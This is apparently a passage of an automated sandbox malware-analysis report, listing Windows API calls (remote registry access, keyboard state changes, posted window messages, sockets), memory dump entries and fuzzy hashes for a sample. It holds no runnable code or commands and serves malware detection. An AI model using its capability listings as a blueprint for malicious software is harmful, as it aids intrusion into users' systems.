  • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
• _wcscpy.LIBCMT ref: 00467641
• GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
• _wcslen.LIBCMT ref: 00467793
• _wcslen.LIBCMT ref: 004677BD
  • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
• GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                                                                                                                                                                • String ID: X
                                                                                                                                                                                                                • API String ID: 780548581-3081909835
                                                                                                                                                                                                                • Opcode ID: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                                                                                                • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a7296b1c5eaaf12ad4c2d2a839e078d9dce1648221bbe8eaefb4bf91c000afd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
APIs
  • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
  • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
  • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
  • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
• Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
• MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
• AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
• LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
• CloseFigure.GDI32(?), ref: 0044751F
• SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
• Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
• String ID:
• API String ID: 4082120231-0
• Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
• Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
• Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
• RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
• RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
• RegCloseKey.ADVAPI32(?), ref: 0046B49D
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
• String ID:
• API String ID: 2027346449-0
• Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
• Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
• Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
APIs
  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
• GetMenu.USER32 ref: 0047A703
• GetMenuItemCount.USER32(00000000), ref: 0047A74F
• GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
• _wcslen.LIBCMT ref: 0047A79E
• GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
• GetSubMenu.USER32(00000000,?), ref: 0047A7F2
• PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
• String ID:
• API String ID: 3257027151-0
• Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
• Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
• Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
APIs
• select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
• WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
                                                                                                                                                                                                                • API ID: ErrorLastselect
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 215497628-0
                                                                                                                                                                                                                • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
APIs
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
• Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
• Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
APIs
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
• Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
• Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
• Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
APIs
• SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
• ImageList_Remove.COMCTL32(?,?), ref: 004553D3
• SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
• DeleteObject.GDI32(?), ref: 00455736
• DeleteObject.GDI32(?), ref: 00455744
• DestroyIcon.USER32(?), ref: 00455752
• DestroyWindow.USER32(?), ref: 00455760
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
• String ID:
• API String ID: 2354583917-0
• Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
• Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
• Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
• Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
• Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
APIs
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
• SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$Enable$Show$MessageMoveSend
• String ID:
• API String ID: 896007046-0
• Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
• Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
• Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
• Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59

APIs
• SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
• GetFocus.USER32 ref: 00448ACF
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Window$Enable$Show$FocusMessageSend
• String ID:
• API String ID: 3429747543-0
• Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
• Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
• Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
• Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59

APIs
  • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
  • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
  • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
• KillTimer.USER32(?,?,?,?,?), ref: 004012D3
• SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
• Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
• String ID:
• API String ID: 3300667738-0
• Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
• Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
• Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D459
• GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
• __swprintf.LIBCMT ref: 0045D4E9
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\VH
• API String ID: 3164766367-2432546070
• Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
• Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94

APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                • String ID: Msctls_Progress32
                                                                                                                                                                                                                • API String ID: 3850602802-3636473452
                                                                                                                                                                                                                • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
APIs
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
• Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
• Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
